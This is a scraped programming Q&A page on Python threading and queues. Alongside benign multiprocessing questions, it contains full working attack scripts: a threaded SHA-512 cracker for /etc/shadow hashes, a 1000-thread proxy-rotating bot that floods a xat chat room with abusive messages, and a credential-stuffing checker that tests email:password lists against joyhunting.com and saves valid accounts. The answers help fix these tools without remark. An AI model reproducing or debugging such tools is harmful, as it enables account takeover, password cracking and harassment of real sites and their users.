Python threads repeating values - python

I am trying to write a python SHA512 brute forcer.
I use a Queue to store the values in the wordlist and then compare them against the encrypted hash.
The problem is that, instead of the values being popped out of the Queue, they are reused by other threads. So basically, instead of having the whole work split between threads to make things faster, I got several threads doing the exact same thing. How can I fix this?
I want something like this: https://github.com/WillPennell/Python/blob/master/Black-Hat-Python/BHP-Code/Chapter5/content_bruter.py#L20
import threading
import thread
import Queue
import os,sys
import crypt
import codecs
from datetime import datetime,timedelta
import argparse
today = datetime.today()
resume = None
threads = 5
def build_wordlist(wordlist_file):
fd = open(wordlist_file,"rb")
raw_words = fd.readlines()
fd.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming wordlist from: %s" % resume
else:
words.put(word)
return words
def testPass(cryptPass,user):
word_queue = build_wordlist('test.txt')
while not word_queue.empty():
attempt = word_queue.get()
ctype = cryptPass.split("$")[1]
if ctype == '6':
print "[+] Hash type SHA-512 detected ..."
salt = cryptPass.split("$")[2]
insalt = "$" + ctype + "$" + salt + "$"
word = attempt
cryptWord = crypt.crypt(word,insalt)
if (cryptWord == cryptPass):
time = time = str(datetime.today() - today)
print "[+] Found password for the user: " + user + " ====> " + word + " Time: "+time+"\n"
return
print "Password not found for the user: " + user
print "Moving on to next user..."
exit
def main():
parse = argparse.ArgumentParser(description='A simple brute force /etc/shadow .')
parse.add_argument('-f', action='store', dest='path', help='Path to shadow file, example: \'/etc/shadow\'')
argus=parse.parse_args()
if argus.path == None:
parse.print_help()
exit
else:
build_wordlist('test.txt')
passFile = open (argus.path,'r')
for line in passFile.readlines():
line = line.replace("\n","").split(":")
if not line[1] in [ 'x' , '*' , '!' ]:
user = line[0]
cryptPass = line[1]
for i in range(threads):
t = threading.Thread(target=testPass,args=(cryptPass,user))
t.daemon = True
t.start()
if __name__=="__main__":
main()
EDIT: I realized there are 2 ways I can do this:
first, I can create a thread for each user, which is not what I want.
Second, I can split the work of each user through several threads, which is what I want.

Let's look at this block of code :
for i in range(threads):
t = threading.Thread(target=testPass,args=(cryptPass,user))
t.daemon = True
t.start()
And let's describe what this is doing for each thread you start :
create a new Queue object from test.txt as defined by build_wordlist
Process the queue from step 1
It sounds like your desired behavior is to multithread some processing step on a single queue rather than create duplicates of the same queue. So this means your "testPass" method should probably take in a Queue object. i.e.
q = build_wordlist('test.txt')
for i in range(threads):
t = threading.Thread(target=testPass,args=(q, cryptPass,user))
t.daemon = True
t.start()
and testPass should look like :
def testPass(queue, cryptPass, user):
word_queue = queue
... stuff ...

Related

Multiprocessing Queue.get() hangs

I'm trying to implement basic multiprocessing and I've run into an issue. The python script is attached below.
import time, sys, random, threading
from multiprocessing import Process
from Queue import Queue
from FrequencyAnalysis import FrequencyStore, AnalyzeFrequency
append_queue = Queue(10)
database = FrequencyStore()
def add_to_append_queue(_list):
append_queue.put(_list)
def process_append_queue():
while True:
item = append_queue.get()
database.append(item)
print("Appended to database in %.4f seconds" % database.append_time)
append_queue.task_done()
return
def main():
database.load_db()
print("Database loaded in %.4f seconds" % database.load_time)
append_queue_process = Process(target=process_append_queue)
append_queue_process.daemon = True
append_queue_process.start()
#t = threading.Thread(target=process_append_queue)
#t.daemon = True
#t.start()
while True:
path = raw_input("file: ")
if path == "exit":
break
a = AnalyzeFrequency(path)
a.analyze()
print("Analyzed file in %.4f seconds" % a._time)
add_to_append_queue(a.get_results())
append_queue.join()
#append_queue_process.join()
database.save_db()
print("Database saved in %.4f seconds" % database.save_time)
sys.exit(0)
if __name__=="__main__":
main()
The AnalyzeFrequency analyzes the frequencies of words in a file and get_results() returns a sorted list of said words and frequencies. The list is very large, perhaps 10000 items.
This list is then passed to the add_to_append_queue method which adds it to a queue. The process_append_queue takes the items one by one and adds the frequencies to a "database". This operation takes a bit longer than the actual analysis in main() so I am trying to use a seperate process for this method. When I try and do this with the threading module, everything works perfectly fine, no errors. When I try and use Process, the script hangs at item = append_queue.get().
Could someone please explain what is happening here, and perhaps direct me toward a fix?
All answers appreciated!
UPDATE
The pickle error was my fault, it was just a typo. Now I am using the Queue class within multiprocessing but the append_queue.get() method still hangs.
NEW CODE
import time, sys, random
from multiprocessing import Process, Queue
from FrequencyAnalysis import FrequencyStore, AnalyzeFrequency
append_queue = Queue()
database = FrequencyStore()
def add_to_append_queue(_list):
append_queue.put(_list)
def process_append_queue():
while True:
database.append(append_queue.get())
print("Appended to database in %.4f seconds" % database.append_time)
return
def main():
database.load_db()
print("Database loaded in %.4f seconds" % database.load_time)
append_queue_process = Process(target=process_append_queue)
append_queue_process.daemon = True
append_queue_process.start()
#t = threading.Thread(target=process_append_queue)
#t.daemon = True
#t.start()
while True:
path = raw_input("file: ")
if path == "exit":
break
a = AnalyzeFrequency(path)
a.analyze()
print("Analyzed file in %.4f seconds" % a._time)
add_to_append_queue(a.get_results())
#append_queue.join()
#append_queue_process.join()
print str(append_queue.qsize())
database.save_db()
print("Database saved in %.4f seconds" % database.save_time)
sys.exit(0)
if __name__=="__main__":
main()
UPDATE 2
This is the database code:
class FrequencyStore:
def __init__(self):
self.sorter = Sorter()
self.db = {}
self.load_time = -1
self.save_time = -1
self.append_time = -1
self.sort_time = -1
def load_db(self):
start_time = time.time()
try:
file = open("results.txt", 'r')
except:
raise IOError
self.db = {}
for line in file:
word, count = line.strip("\n").split("=")
self.db[word] = int(count)
file.close()
self.load_time = time.time() - start_time
def save_db(self):
start_time = time.time()
_db = []
for key in self.db:
_db.append([key, self.db[key]])
_db = self.sort(_db)
try:
file = open("results.txt", 'w')
except:
raise IOError
file.truncate(0)
for x in _db:
file.write(x[0] + "=" + str(x[1]) + "\n")
file.close()
self.save_time = time.time() - start_time
def create_sorted_db(self):
_temp_db = []
for key in self.db:
_temp_db.append([key, self.db[key]])
_temp_db = self.sort(_temp_db)
_temp_db.reverse()
return _temp_db
def get_db(self):
return self.db
def sort(self, _list):
start_time = time.time()
_list = self.sorter.mergesort(_list)
_list.reverse()
self.sort_time = time.time() - start_time
return _list
def append(self, _list):
start_time = time.time()
for x in _list:
if x[0] not in self.db:
self.db[x[0]] = x[1]
else:
self.db[x[0]] += x[1]
self.append_time = time.time() - start_time
Comments suggest you're trying to run this on Windows. As I said in a comment,
If you're running this on Windows, it can't work - Windows doesn't
have fork(), so each process gets its own Queue and they have nothing
to do with each other. The entire module is imported "from scratch" by
each process on Windows. You'll need to create the Queue in main(),
and pass it as an argument to the worker function.
Here's fleshing out what you need to do to make it portable, although I removed all the database stuff because it's irrelevant to the problems you've described so far. I also removed the daemon fiddling, because that's usually just a lazy way to avoid shutting down things cleanly, and often as not will come back to bite you later:
def process_append_queue(append_queue):
while True:
x = append_queue.get()
if x is None:
break
print("processed %d" % x)
print("worker done")
def main():
import multiprocessing as mp
append_queue = mp.Queue(10)
append_queue_process = mp.Process(target=process_append_queue, args=(append_queue,))
append_queue_process.start()
for i in range(100):
append_queue.put(i)
append_queue.put(None) # tell worker we're done
append_queue_process.join()
if __name__=="__main__":
main()
The output is the "obvious" stuff:
processed 0
processed 1
processed 2
processed 3
processed 4
...
processed 96
processed 97
processed 98
processed 99
worker done
Note: because Windows doesn't (can't) fork(), it's impossible for worker processes to inherit any Python object on Windows. Each process runs the entire program from its start. That's why your original program couldn't work: each process created its own Queue, wholly unrelated to the Queue in the other process. In the approach shown above, only the main process creates a Queue, and the main process passes it (as an argument) to the worker process.
queue.Queue is thread-safe, but doesn't work across processes. This is quite easy to fix, though. Instead of:
from multiprocessing import Process
from Queue import Queue
You want:
from multiprocessing import Process, Queue

how two process communicate with each other

I'm very new with python.
I started implementing twp daemon processes that will send messages to each other.
right now i have just 2 daemons that are running.
I don't understand how to build something that they can communicate through..
I read that there are pipe, or queue ...
sill, could not understand how to build a pipe or a queue that the two ends will be the two processes..
import multiprocessing
import time
import sys
def daemon():
p = multiprocessing.current_process()
print 'Starting:', p.name, p.pid
sys.stdout.flush()
while (1):
time.sleep(1)
print 'Exiting :', p.name, p.pid
sys.stdout.flush()
def machine_func():
p = multiprocessing.current_process()
print 'Starting:', p.name, p.pid
sys.stdout.flush()
while (1):
time.sleep(1)
print 'Exiting :', p.name, p.pid
sys.stdout.flush()
cs = multiprocessing.Process(name='control_service', target=control_service_func)
cs.daemon = True
m = multiprocessing.Process(name='machine', target=machine_func)
m.daemon = True
cs.start()
m.start()
You can find very good examples here: Communication Between Processes
you can communicate with daemons via text files like this:
from multiprocessing import Process
from ast import literal_eval as literal
from random import random
import time
def clock(): # 24 hour clock formatted HH:MM:SS
return str(time.ctime())[11:19]
def sub_a(): # writes dictionary that tallys +/- every second
a = 0
while 1:
data = {'a': a}
opened = 0
while not opened:
try:
with open('a_test.txt', 'w+') as file:
file.write(str(data))
opened = 1
except:
print ('b_test.txt in use, try WRITE again...')
pass
a+=1
time.sleep(random()*2)
def sub_b(): # writes dictionary that tallys +/- every 2 seconds
b = 0
while 1:
data = {'b': b}
opened = 0
while not opened:
try:
with open('b_test.txt', 'w+') as file:
file.write(str(data))
opened = 1
except:
print ('b_test.txt in use, try WRITE again...')
pass
b += 1
time.sleep(random()*4)
# clear communication lines
with open('a_test.txt', 'w+') as file:
file.write('')
with open('b_test.txt', 'w+') as file:
file.write('')
# begin daemons
sa = Process(target=sub_a)
sa.daemon = True
sb = Process(target=sub_b)
sb.daemon = True
sa.start()
sb.start()
begin = time.time()
m = 0
while 1:
m += 1
time.sleep(1)
elapsed = int(time.time()-begin)
#fetch data from deamons
opened = 0
while not opened:
try:
with open('a_test.txt', 'r') as f:
a = literal(f.read())
opened = 1
except:
print ('a_test.txt in use, try READ again...')
pass
opened = 0
while not opened:
try:
with open('b_test.txt', 'r') as f:
b = literal(f.read())
opened = 1
except:
print ('READ b_test.txt in use, try READ again...')
pass
print(clock(), '========', elapsed, b['b'], a['a'])
in this manner you can make object (like a dict) into string, write() to file, then:
ast.literal_eval
to get it back out on the other side when you read()
while not opened try
method prevents race condition so daemons and main process have time needed to not clash while they open/process/close the file
with open as file
method ensures file is opened and closed efficiently
added bonus is you can open the text file in an editor to check its state in real time.

Python Multi Threading Variables getting overwritten and mixed up

It tries to make two connections per thread now, still fails.
I think I solved the shared access thing because it uses self.x instead of local variables?
I'm not sure what the problem is :/, you don't happen to be a freelancer?
#!/usr/bin/python
from xml.etree.ElementTree import fromstring
from socks import socksocket, PROXY_TYPE_SOCKS5
from socket import socket, AF_INET, SOCK_STREAM
from linecache import getline
from threading import Thread, current_thread, Lock, activeCount
from os.path import isfile, getmtime
from urllib import urlopen
from time import time, sleep
from sys import exit
from json import loads
from random import randint, randrange, choice
from urlparse import parse_qs
from pprint import pprint
class myThread (Thread):
def __init__(self, threadID, name):
Thread.__init__(self)
self.threadID = threadID
self.name = name
def run(self):
self.user = parse_qs(getline('./_files/ids.txt', randint(1, idLen)).strip("\n"))
self.proxy = getline('./_files/proxies.txt', randint(1, proxyLen)).strip("\n").split(":")
self.user2 = parse_qs(getline('./_files/ids.txt', randint(1, idLen)).strip("\n"))
self.proxy2 = getline('./_files/proxies.txt', randint(1, proxyLen)).strip("\n").split(":")
try:
self.socket = socksocket(AF_INET, SOCK_STREAM)
self.socket.settimeout(5)
self.socket.setproxy(PROXY_TYPE_SOCKS5, self.proxy[0], int(self.proxy[1]))
self.socket2 = socksocket(AF_INET, SOCK_STREAM)
self.socket2.settimeout(5)
self.socket2.setproxy(PROXY_TYPE_SOCKS5, self.proxy2[0], int(self.proxy2[1]))
self.socket.connect((chatConnection[0], int(chatConnection[1])))
self.socket2.connect((chatConnection[0], int(chatConnection[1])))
send(self.socket, "<y r=\"%s\" v=\"0\" u=\"%s\" />\0" % (room, self.user["UserId"][0]))
send(self.socket2, "<y r=\"%s\" v=\"0\" u=\"%s\" />\0" % (room, self.user2["UserId"][0]))
self.data = read(self.socket)
self.data2 = read(self.socket2)
if self.data == "" or not self.data: return
if self.data2 == "" or not self.data2: return
self.xml = fromstring(self.data.strip(chr(0))).attrib
self.xml2 = fromstring(self.data2.strip(chr(0))).attrib
self.bSock = socket(AF_INET, SOCK_STREAM)
self.bSock.settimeout(5)
self.bSock2 = socket(AF_INET, SOCK_STREAM)
self.bSock2.settimeout(5)
self.bSock.connect(("127.0.0.1", 1337))
send(self.bSock, "<bot p=\"%s\" yi=\"%s\" au=\"%s\" />\0" % (self.xml["p"], self.xml["i"], self.xml["au"]))
self.data = read(self.bSock)
send(self.bSock, "<bot p=\"%s\" yi=\"%s\" au=\"%s\" />\0" % (self.xml2["p"], self.xml2["i"], self.xml2["au"]))
self.data2 = read(self.bSock)
self.data = self.data.replace("_lol", "")
self.l5 = self.data[self.data.find('l5="') + 4:]
self.l5 = self.l5[:self.l5.find('"')]
self.ya = self.data[self.data.find('c="') + 3:]
self.ya = self.ya[:self.ya.find('"')]
self.data2 = self.data2.replace("_lol", "")
self.l52 = self.data2[self.data2.find('l5="') + 4:]
self.l52 = self.l52[:self.l52.find('"')]
self.ya2 = self.data2[self.data2.find('c="') + 3:]
self.ya2 = self.ya2[:self.ya2.find('"')]
print self.ya2 + " : " + self.l52
self.bSock.close()
self.yaSock = socksocket(AF_INET, SOCK_STREAM)
self.yaSock.settimeout(5)
self.yaSock.setproxy(PROXY_TYPE_SOCKS5, self.proxy[0], int(self.proxy[1]))
self.yaSock.connect((chatConnection[0], int(chatConnection[1])))
self.yaSock2 = socksocket(AF_INET, SOCK_STREAM)
self.yaSock2.settimeout(5)
self.yaSock2.setproxy(PROXY_TYPE_SOCKS5, self.proxy2[0], int(self.proxy2[1]))
self.yaSock2.connect((chatConnection[0], int(chatConnection[1])))
send(self.yaSock, "<ya r=\"%s\" u=\"%s\" c=\"%s\" k=\"%s\" />\0" % (room, self.user["UserId"][0], self.ya, self.xml["k"]))
print read(self.yaSock)
self.yaSock.close()
send(self.yaSock2, "<ya r=\"%s\" u=\"%s\" c=\"%s\" k=\"%s\" />\0" % (room, self.user2["UserId"][0], self.ya2, self.xml2["k"]))
print read(self.yaSock2)
self.yaSock2.close()
self.j2 = "<j2 Y=\"2\" l5=\"" + self.l5 + "\" l4=\"1200\" l3=\"844\" l2=\"0\" cb=\"0\" q=\"1\" y=\"" + self.xml["i"] + "\" k=\"" + self.user["k1"][0] + "\" k3=\"0\" p=\"0\" c=\"" + room + "\" f=\"2\" u=\"" + self.user["UserId"][0] + "\" d0=\"0\" n=\"Zuhnny\" a=\"1\" h=\"xat sux\" v=\"0\" />\0"
self.j22 = "<j2 Y=\"2\" l5=\"" + self.l52 + "\" l4=\"1200\" l3=\"844\" l2=\"0\" cb=\"0\" q=\"1\" y=\"" + self.xml2["i"] + "\" k=\"" + self.user2["k1"][0] + "\" k3=\"0\" p=\"0\" c=\"" + room + "\" f=\"2\" u=\"" + self.user2["UserId"][0] + "\" d0=\"0\" n=\"Zuhnny\" a=\"1\" h=\"xat sux\" v=\"0\" />\0"
send(self.socket, self.j2)
send(self.socket2, self.j22)
while True:
print self.socket.recv(6096)
print self.socket2.recv(6096)
sleep(1)
send(self.socket, "<m t=\" F U C K X A T %s\" u=\"%s\" />\0" % (randint(0,5000), self.user["UserId"][0]))
send(self.socket2, "<m t=\" F U C K X A T %s\" u=\"%s\" />\0" % (randint(0,5000), self.user2["UserId"][0]))
except IOError, err: pass
except Exception, error: pass
def read(socket):
data = socket.recv(1024)
return data
def send(socket, data):
socket.sendall(data)
def getChatConnection(room):
print '\ntest\n'
if not isfile('./_files/ips.txt') or time() - getmtime('./_files/ips.txt') > 86400:
fh = open('./_files/ips.txt', 'w')
fh.write(urlopen('http://xat.com/web_gear/chat/ip2.htm?' + str(time())).read())
fh.close()
try:
fh = open('./_files/ips.txt', 'r')
iprules = loads(fh.read())
Fx = iprules[iprules["order"][0][0]]
xAddr = Fx[1][randint(0, len(Fx[1]) - 1)].split(':')
if len(xAddr) == 1: xAddr.append(10000)
if len(xAddr) == 2: xAddr.append(39)
xPort = xAddr[1] + randint(0, xAddr[2] - 1)
return (xAddr[0], 9999 + int(room) if int(room) < 8 else 10007 + (int(room) % 32))
except Exception, e:
print e
file = open("./_files/proxies.txt")
proxyLen = len(map(lambda(x): x.split(':'), file))
file2 = open("./_files/ids.txt")
idLen = len(map(lambda(x): x.split('\n'), file2))
threadLock = Lock()
threads = []
room = raw_input("Room ID to raid: ")
chatConnection = getChatConnection(room)
for x in range(1000):
threads.append(myThread(x, "Thread-" + str(x)).start())
# Wait for all threads to complete
for t in threads:
t.join()
print "Exiting Main Thread"
I have a guess at your problem. I don't think it actually is race conditions at all. I haven't read all of your code carefully, but I don't see any global or otherwise shared variables being mutated. But I do see a different problem.
You aren't buffering up your reads; you're just expecting that each bSock.recv(1024) is going to receive exactly one message. That isn't how TCP works; you may receive half of a message, or two messages, or the second half of the previous message and the first half of the next.
If you don't stress your computer or the network very hard, and your messages are all pretty small, it may (depending on the platform) work 99.9% of the time, meaning you don't notice any problem. But as soon as you stress things, it'll start to fail more often.
And you've got 400 threads, and from your old-style code (e.g., except Type, value) it looks like you may be on a system old enough that it's stuck on Python 2.5, which means you may be stressing the system very hard.
You need to fix this by receiving in a loop until you have one or more complete messages, then handling those messages, then returning to the loop, instead of handling each recv as if it were guaranteed to be exactly one complete message.
Fortunately, you're dealing with IRC, which (assuming you're not doing any DCC, etc.) has exactly one command per line, and Python has a nice wrapper around sockets that makes them look like line-buffered files. So you can do this:
bfile = bsock.makefile()
for line in bfile:
Now you know that line is guaranteed to be a complete line, even if it had to do three reads, and buffer up most of the third read until your next time through the loop.
You're doing the same thing in at least three places, so obviously you need to fix them all. Also, you need to make sure to close the socket and the file appropriately. And you need to detect when the other sides closes the socket. (The recv, or the next line, will return an empty string.)
Another possibility:
There is at least one thing all of the threads are sharing: that bsock socket. And they all do this 5 seconds after launch:
bSock.sendall("<bot p=\"%s\" au=\"%s\" yi=\"%s\" />\0" % (xml["p"], xml["au"], xml["i"]))
data = bSock.recv(1024)
What's to stop thread #42 from doing its sendall, then thread #23 doing its sendall, then thread #42 from doing its recv and getting the data intended for thread #42?
This is what's called a "critical section" or "atomic block": a chunk of code that only one thread can run at a time or everyone will get confused. The usual way around it is to share a Lock, and have each thread acquire the Lock before running this code. If thread #42 already has the lock, and thread #23 tries to acquire it, it will be blocked until thread #42 releases the lock, so there's no chance of them conflicting. So:
bSockLock = threading.Lock()
# ...
for x in range(400):
Thread(target = __init__, args=[chatConnection, bSock, bSockLock]).start()
# ...
def __init__(chatConnection, bSock):
# ...
for x in range(3):
start(chatConnection, proxies[x][0], proxies[x][1], [ids[x]["UserId"][0], ids[x]["k1"][0], ids[x]["k2"][0]], room, bSock, bSockLock)
# ...
def start(chatConnection, proxyIP, proxyPort, user, room, bSock, bSockLock):
# ...
with bSockLock:
bSock.sendall("<bot p=\"%s\" au=\"%s\" yi=\"%s\" />\0" % (xml["p"], xml["au"], xml["i"]))
data = bSock.recv(1024)

Python Multiprocessing arcgis shapefiles with PP or async stalling on large files

I am new trying to implement either Parallel Python (PP) or async to multiprocess arcgis shapefile clipping. I have been successful with both pool_async and PP; however, it stalls forever on big files (and yes I tried making python access large addresses). Here is my code using PP, please offer any solutions and sorry for glaring errors if there are :-)
def ClipDo(F,M,O,OW = ""):
#for F in F:
print "\n"+"PID:%s"%(os.getpid())
arcpy.env.overwriteOutput = False
if OW == "":
pass
else:
arcpy.env.overwriteOutput = True
FPath = os.path.dirname(F)
F = os.path.basename(F)
ClipList = []
pattern = '*.shp'
for filename in M:
ClipList.append(filename)
clipN = str(os.path.splitext(os.path.basename(filename))[0])
if not os.path.isdir(O+"/"+clipN+"/"):
os.makedirs(O+"/"+clipN+"/")
#Counts files in clip directory
count = len(ClipList)
for num in range(0,count):
clip = ClipList[num]
clipN = str(os.path.splitext(os.path.basename(clip))[0])
OutShp = clipN +"_"+ F
try:
print "Clipping, Base File: %s Clip File: %s Output: %s" % (F,clip,O+"\\"+OutShp)
arcpy.Clip_analysis(os.path.join(FPath,F),os.path.join(M,clip), os.path.join(os.path.join(O+"\\",clipN),OutShp))
print "Clipping SUCCESS "
except:
print "Clipping FAILED " +F
def PP(F,M,O,OW):
print F
#~ # tuple of all parallel python servers to connect with
ncpus = 6
ncpus = ncpus
ppservers = ("localhost",)
#~ #ppservers = ("10.0.0.1",)
if len(sys.argv) > 1:
ncpus = int(sys.argv[1])
# Creates jobserver with ncpus workers
job_server = pp.Server(ncpus, ppservers=ppservers)
else:
#~ # Creates jobserver with automatically detected number of workers
job_server = pp.Server(ncpus,ppservers=ppservers)
print "Starting pp with", job_server.get_ncpus(), "workers"
jobs = []
start_time = time.time()
for f in F:
job = job_server.submit(ClipDo, (f,M,O,OW),(), ("arcpy","NullGeomFilter"))
jobs.append(job)
for job in jobs:
result = job()
print result
if result:
break
job_server.destroy()
print "\n"+"PID:%s"%(os.getpid())
print "Time elapsed: ", time.time() - start_time, "s"
Could it be that your big chunks are just too big for arcpy and that the parallelization is not the problem?
As a test, it might be good to run one of arg lists through your function with the big data interactively/locally to see if that's working at all. If it does, then you could move on to logging and debugging the parallel version.

python thread queue question

Hell All.
i was made some python script with thread which checking some of account exist in some website
if i run thread 1 , it working well but if increase thread such like 3~5 and above,
result was very different compare with thread 1 and i was checked manually and
if i increase thread result was not correct.
i think some of my thread code have to tune or how about use Queue module ?
anyone can advice or tuneing my script? Thanks in advance!
# -*- coding: cp949 -*-
import sys,os
import mechanize, urllib
import cookielib
import re
from BeautifulSoup import BeautifulSoup,BeautifulStoneSoup,Tag
import re,sys,os,mechanize,urllib,threading,time
# Maximum number of process to spawn at any one given time.
MAX_PROCS =5
maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'
# Threading class
class CheckMyThread ( threading.Thread ):
llemail = ""
llpassword = ""
def __init__ ( self , lemail, lpassword):
self.llemail = lemail
self.llpassword = lpassword
threading.Thread.__init__( self )
pass
def run ( self ):
valid = []
llemail = self.llemail
llpassword = self.llpassword
try:
params = urllib.urlencode({'userid':llemail, 'passwd':llpassword})
rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
rs = mechanize.urlopen(rq)
data = rs.read()
logged_in = r'var _id' in data #정상 로그인
if logged_in :
rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
rs = mechanize.urlopen(rq)
maindata = rs.read(50024)
jun_member = r"준회원"
save = open(SAVEFILE, 'a')
for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
matched = match.group(1)
for match2 in re.finditer(r"var _gd(.*?);", data):
matched2 = match2.group(1)
print '%s, %s' %(matched, matched2)
break
rq1=mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid="+llemail+"&ToID=undefined&hide=undefined")
rs1=mechanize.urlopen(rq1)
sendmsg= rs1.read()
#print sendmsg
match3 = ''
for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
matched3 = match3.group(1)
#print matched3
print 'bad'
break
if match3 =='':
save.write('%s, %s, %s:%s ' %(matched, matched2, llemail, llpassword + '\n'))
save.close()
print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)
else:
print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
return 0
except:
print '[!] Exception checking %s.' % (llemail)
return 1
return 0
try:
listhandle = open(maillist);
#Bail out if the file doesn't exist
except:
print '[!] %s does not exist. Please create the file!' % (maillist)
exit (2)
#Loop through the file
for line in listhandle:
#Parse the line
try:
details = line.split(':')
email = details[0]
password = details[1].replace('\n', '')
#Throw an error and exit.
except:
print '[!] Parse Error in %s on line %n.' % (maillist, currline)
exit
#Run a while statement:
if len(threads) < MAX_PROCS:
#Fork out into another process
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
else:
#Wait for a thread to exit.
gonext = 0
while 1 == 1:
i = 0
#print '[ ] Checking for a thread to exit...'
while i < len(threads):
#print '[ ] %d' % (i)
try:
if threads[i]:
if not threads[i].isAlive():
#print '[-] Thread %d is dead' % (i)
threads.pop(i)
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
gonext = 1
break
else:
#print '[+] Thread %d is still running' % (i)
pass
else:
print '[ ] Crap.';
except NameError:
print '[ ] AWWW COME ON!!!!'
i = i + 1
time.sleep(0.050);
if gonext:
break
Can You please specify what are different results?
From what I see, code is doing much more than verifying account.
From what I see, You're appending to a single file from multiple threads, I'd say it's not thread-safe.
Also, AFAIK Mechanize uses shared cookie storage for all requests, so they are probably interfering. Use separate mechanize.Browser() inside run() instead of mechanize.Request().

Categories

Resources